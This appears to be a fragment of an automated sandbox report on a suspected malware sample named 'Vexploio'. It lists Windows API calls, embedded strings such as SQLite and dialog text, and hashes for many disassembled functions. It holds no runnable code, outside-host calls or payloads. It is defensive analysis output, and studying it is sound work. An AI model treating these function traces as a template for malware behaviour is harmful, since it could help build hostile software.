                              • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                              APIs
                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                              • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: PathTemp$??3@
                              • String ID: %s\etilqs_$etilqs_
                              • API String ID: 1589464350-1420421710
                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                              APIs
                              • memset.MSVCRT ref: 0040FDD5
                                • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                              • _snwprintf.MSVCRT ref: 0040FE1F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                              • String ID: <%s>%s</%s>$</item>$<item>
                              • API String ID: 1775345501-2769808009
                              • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                              • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                              APIs
                              • wcscpy.MSVCRT ref: 0041477F
                              • wcscpy.MSVCRT ref: 0041479A
                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: wcscpy$CloseCreateFileHandle
                              • String ID: General
                              • API String ID: 999786162-26480598
                              • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                              • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                              APIs
                              • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                              • _snwprintf.MSVCRT ref: 0040977D
                              • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ErrorLastMessage_snwprintf
                              • String ID: Error$Error %d: %s
                              • API String ID: 313946961-1552265934
                              • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                              • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID:
                              • String ID: foreign key constraint failed$new$oid$old
                              • API String ID: 0-1953309616
                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                              APIs
                              Strings
                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy
                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                              • API String ID: 3510742995-272990098
                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpymemset
                              • String ID: gj
                              • API String ID: 1297977491-4203073231
                              • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                              • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                              APIs
                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@
                              • String ID:
                              • API String ID: 613200358-0
                              • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                              • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                              APIs
                              • AreFileApisANSI.KERNEL32 ref: 00417497
                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                              • malloc.MSVCRT ref: 004174BD
                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                              • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                              • String ID:
                              • API String ID: 2903831945-0
                              • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                              • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                              APIs
                              • GetParent.USER32(?), ref: 0040D453
                              • GetWindowRect.USER32(?,?), ref: 0040D460
                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Window$Rect$ClientParentPoints
                              • String ID:
                              • API String ID: 4247780290-0
                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                              APIs
                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                              • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                              • memset.MSVCRT ref: 004450CD
                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                              • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                              • String ID:
                              • API String ID: 1471605966-0
                              • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                              • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                              APIs
                              • wcscpy.MSVCRT ref: 0044475F
                              • wcscat.MSVCRT ref: 0044476E
                              • wcscat.MSVCRT ref: 0044477F
                              • wcscat.MSVCRT ref: 0044478E
                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                              • String ID: \StringFileInfo\
                              • API String ID: 102104167-2245444037
                              • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                              • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                              • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                              • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@
                              • String ID:
                              • API String ID: 613200358-0
                              • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                              • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                              • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                              • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memcpy$??3@
                              • String ID: g4@
                              • API String ID: 3314356048-2133833424
                              • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                              • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                              APIs
                              • GetSystemMetrics.USER32(00000000), ref: 00401990
                              • GetSystemMetrics.USER32(00000001), ref: 0040199B
                              • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: MetricsSystem$PlacementWindow
                              • String ID: AE
                              • API String ID: 3548547718-685266089
                              • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                              • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                              • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                              • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _memicmpwcslen
                              • String ID: @@@@$History
                              • API String ID: 1872909662-685208920
                              • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                              • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                              APIs
                              • memset.MSVCRT ref: 004100FB
                              • memset.MSVCRT ref: 00410112
                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                              • _snwprintf.MSVCRT ref: 00410141
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$_snwprintf_wcslwrwcscpy
                              • String ID: </%s>
                              • API String ID: 3400436232-259020660
                              • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                              • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                              APIs
                              • memset.MSVCRT ref: 0040E770
                              • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: MessageSendmemset
                              • String ID: AE$"
                              • API String ID: 568519121-1989281832
                              • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                              • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                              APIs
                              • memset.MSVCRT ref: 0040D58D
                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ChildEnumTextWindowWindowsmemset
                              • String ID: caption
                              • API String ID: 1523050162-4135340389
                              • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                              • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                              APIs
                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                              • String ID: MS Sans Serif
                              • API String ID: 210187428-168460110
                              • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                              • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ClassName_wcsicmpmemset
                              • String ID: edit
                              • API String ID: 2747424523-2167791130
                              • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                              • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                              APIs
                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                              • String ID: SHAutoComplete$shlwapi.dll
                              • API String ID: 3150196962-1506664499
